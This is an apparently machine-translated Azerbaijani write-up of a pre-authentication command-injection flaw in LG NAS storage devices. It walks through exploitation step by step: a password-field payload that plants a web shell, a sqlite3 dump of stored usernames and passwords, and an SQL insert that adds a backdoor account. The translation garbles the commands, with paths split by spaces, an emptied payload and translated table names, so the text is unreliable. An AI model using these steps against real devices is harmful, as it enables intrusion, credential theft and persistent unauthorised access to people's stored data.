LG NAS cihazlarının əksəriyyətində kritik zəiflik aşkar edilmişdir
Baxış:
LG NAS cihazında hərtərəfli qiymətləndirmə apardıq. Bu cihaz yalnız səlahiyyətli istifadəçilərə imkan verən bir şəbəkəyə bağlı bir saxlama cihazıdır. Xüsusi bir bulud kimi, yalnız daha az xərc çəkir, işləmək çox sadədir və tam nəzarət imkanı verir. Lakin, əvvəlcədən doğrulanmış uzaqdan əmr vermə həssaslığından (CVE-2023-10818) istifadə edərək sistemə hack etmək üçün bir yol tapdıq, bu da məlumatları əldə etmək və istifadəçi məlumatları və məzmunu dəyişdirmək daxil olmaqla demək olar ki, hər şeyi etməyə imkan verir..
İstifadəsi:
Zəiflik (CVE-2023-10818), LG NAS cihazlarının əksəriyyətində aşkar edilmiş, əvvəlcədən təsdiqlənmiş uzaqdan əmr injection zəifliyidir..
Videoda göstərdiyimiz kimi, sadəcə təsadüfi bir istifadəçi adı və şifrə ilə daxil ola bilməzsiniz. Bununla birlikdə, “parol” parametrində bir əmr injection həssaslığı mövcuddur (burp kimi bir kəsici istifadə etməlisiniz). Sadəcə əlavə etməklə bu hata tetikleyebilirik. Yeni bir istifadəçi əlavə etmək üçün sadəcə istifadə edərək c.php adlı davamlı bir qabıq yaza bilərik:
; echo “” > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Onu parol kimi daxil etmək həssaslığı istismar edir.
Sonra, aşağıdakı əmri keçərək istifadəçiləri “sökə” bilərik:
echo “.dump istifadəçisi” | sqlite3 /etc/nas/db/share.db
Damlama bütün verilənlər bazası məlumatlarını oxumaq deməkdir. İstifadəçilərin istifadəçi adlarını və şifrələrini görmək üçün məlumat bazasını boşaltırıq. Bu da bizə özümüzü əlavə etməyə imkan verir.
Verilənlər bazasına yeni bir istifadəçi əlavə etmək üçün etibarlı MD5 yaratmalıyıq. Daxil olan MD5 alətindən istifadəçi adı “test” və “1234” parolu ilə bir hash yaratmaq üçün istifadə edə bilərik.
sudo nas-adi md5 1234
Etibarlı bir şifrə və istifadəçi adımızı tapdıqdan sonra onu verilənlər bazasına əlavə edə bilərik:
INSERT INTO “user” VALUES (‘test’, ‘md5_hash’, ‘Vuln Test’, ‘test @ localhost’, ”);
Bu tamamlandıqdan sonra istifadəçi adı testi və 1234 şifrə ilə LG Network Storage-yə daxil ola bilərik.
Bu, səlahiyyətli bir istifadəçi olaraq sistemə daxil olmağımızı təmin edir. Buradan LAS cihazında saxlanan hər hansı bir məlumat və ya təsnif edilmiş sənədlərə daxil ola bilərik.
Tövsiyələr:
- LAS cihazlarının hack və istismar edilə biləcəyini unutmayın.
- LG ilə əlaqə saxlayın və bu zəiflik barədə məlumat verin və onu düzəltmələrini tələb edin.
- Dostlarınızı facebook-da xəbərdar et (burada bir link var) və ya twitter (tweet vurun)